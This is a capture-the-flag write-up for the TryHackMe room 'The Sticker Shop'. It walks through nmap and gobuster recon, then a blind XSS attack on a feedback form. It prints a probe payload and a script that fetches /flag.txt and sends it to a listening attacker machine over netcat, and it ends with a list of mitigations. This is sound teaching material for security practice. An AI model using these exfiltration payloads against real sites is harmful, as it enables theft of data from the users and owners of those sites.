The Sticker Shop

https://tryhackme.com/room/thestickershop

https://tryhackme.com/room/thestickershop

🔗 The Sticker Shop​

Task 1 - Deploy the machine

🎯 Target IP: 10.10.73.89

Create a directory for machine on the Desktop and a directory containing the scans with nmap.

Task 2 - Reconnaissance

su
echo "10.10.73.89 tss.thm" >> /etc/hosts

mkdir thm/tss.thm
cd thm/tss.thm
mkdir {nmap,content,exploits,scripts}

# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts

I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.

ping -c 3 tss.thm
PING tss.thm (10.10.73.89) 56(84) bytes of data.
64 bytes from tss.thm (10.10.73.89): icmp_seq=1 ttl=63 time=65.0 ms
64 bytes from tss.thm (10.10.73.89): icmp_seq=2 ttl=63 time=61.9 ms
64 bytes from tss.thm (10.10.73.89): icmp_seq=3 ttl=63 time=62.3 ms

Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix, while Windows systems usually have a TTL of 128 secs.

This guide does not provide a path and intermediate answers, but asks us directly for the flag.

Let's capture her right away with a curl curl -i http://tss.thm:8080/flag.txt

2 of spades! :D

Not worry, start to check information scanning open ports:

nmap --open -p0- -n -Pn -vvv --min-rate 5000 tss.thm -oG nmap/port_scan

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
8080/tcp open  http-proxy syn-ack ttl 63

command	result
sudo	run as root
sC	run default scripts
sV	enumerate versions
A	aggressive mode
T4	run a bit faster
oN	output to file with nmap formatting

It looks like there are 2 open ports on the machine: 22 and 8080.

Now, we need to search which services are running on open ports:

nmap -p22,8080 -n -Pn -vvv -sCV --min-rate 5000 tss.thm -oN nmap/open_port

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b2:54:8c:e2:d7:67:ab:8f:90:b3:6f:52:c2:73:37:69 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDZ5yrbM4EUF9kvSfSmVTdRWGVeqTTpQpwFopgW7iFN3f/I3mBWiJpAGL8Q8rEs7n8ESeN0yRcr1lGSuUtRqk5Mwei9edFIAGFC0uEJMnO7EQl/3O8PAlTGeuIaEg+YItzpmXOIWfslh0oftoQNN0iWouJFj7DU5QtoiuwK9GIDwD54aaJ6QQHu16nYYk0fTmA2szzSy0nL0fG1I+ILOnVf1SEyDu5a+uHSKA4lERXWsJ6KDhEtxAuf1+uk8x33I4ERJQsGEZ/GbFJsPxbWhFgyvRE9cScm+YpeppPBMwbvicnEg+MZLuDfXAzYCsDvXPem8io/8QlqHXAyTb/hfw8twUiLuWRHPuHH6E4tq+cztlD/BsfydBn+72TEB7dZnRnWP4tAnI5au2KiPA1RA3ud3JNn7Ha7iU0AA5MK9gKhSv/S5tDyLhFbAcLm8ByWzdJ1R5F8NIlWG8C9VDgDuixmIQwsV4D7FthMTsDaM5PuJHr5GDOfT56Mn3fGxQT2W4k=
|   256 14:29:ec:36:95:e5:64:49:39:3f:b4:ec:ca:5f:ee:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKVWb4NfXmP4f5RQIvXlrggi/9cDARgYazfJpJFlRhH/Ypg/QO6JQ0cj+BInTq4qjv9q5f1ksX0KLJxT2sc95WI=
|   256 19:eb:1f:c9:67:92:01:61:0c:14:fe:71:4b:0d:50:40 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHQ5WIN3vZO9KIDXb+PpV5yqA3SVieIqn8jSOGdjDHm1
8080/tcp open  http    syn-ack ttl 63 Werkzeug httpd 3.0.1 (Python 3.8.10)
|_http-title: Cat Sticker Shop
|_http-server-header: Werkzeug/3.0.1 Python/3.8.10
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The web server is configured on port 8080 and not on 80, let's go there!

Task 3 - Find the flag.txt

Proceeding to enumerate our website using a cmd tool: whatweb "http://tss.thm:8080"

We just know this info through nmap scan results, we'll investigate very well about "werkzeug 3.0 1 python 3.8 10", we will eventually check if it is vulnerable later.

TNow let's open the browser to view the web page (port 8080):

here, there're two products/sticker images that we can only see.

and see page source for checking information disclosure.

but we don't find precious info.

In the meantime I ran a 'directory enumeration' scan with gobuster, which unfortunately returned no results.

gobuster dir -u http://tss.thm:8080 -w /usr/share/wordlists/dirb/common.txt

Let's move to the second page: "Feedback":

Very good, a textarea where we can write and submit a feedback, it can be an injection point.

Testing the standard XSS payload: <script>alert("XSS")</script> we have no errors, but at the same time nothing is reflected:

let's analyze the thing better by capturing the http request with our dear Burp Suite proxy.

We can see that's a POST request and the following file formats are accepted in the form

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng

Since the possible XSS seems hidden, let's try to see if it allows us to connect to our attacker machine using the javascript method: fetch

Retrieve our attacker machine IP (10.21.31.235)

Go in listening mode with netcat on port 1339: nc -lvnp 1339

and execute into BurpSuite Repeater or directly into textarea this command:

<img src=x onerror="fetch('http://10.21.31.235:1339')"/>

and we receive the request, fantastic!

Based on this and remembering that the flag is in the path /flag.txt, we prepare a payload that allows us to extract the flag in the response:

<script>
fetch('http://tss.thm:8080/flag.txt') // Requests the flag file from the target server
  .then(response => response.text()) // Reads the response as text
  .then(data => {
    fetch('http://10.21.31.235:1339/?data=' + encodeURIComponent(data)) // Sends stolen data to attacker's machine
  })
</script>

Flag found!

Possible Mitigations

• Content Security Policy (CSP): Block inline scripts and limit allowed domains for fetch requests.

• Proper XSS filtering: Sanitize user inputs to prevent script injection.

• Same-Origin Policy enforcement: Ensure sensitive files like flag.txt are not accessible from untrusted origins.

• HttpOnly & Secure cookies: Prevent session hijacking through XSS attacks

🚩 Flag (flag.txt)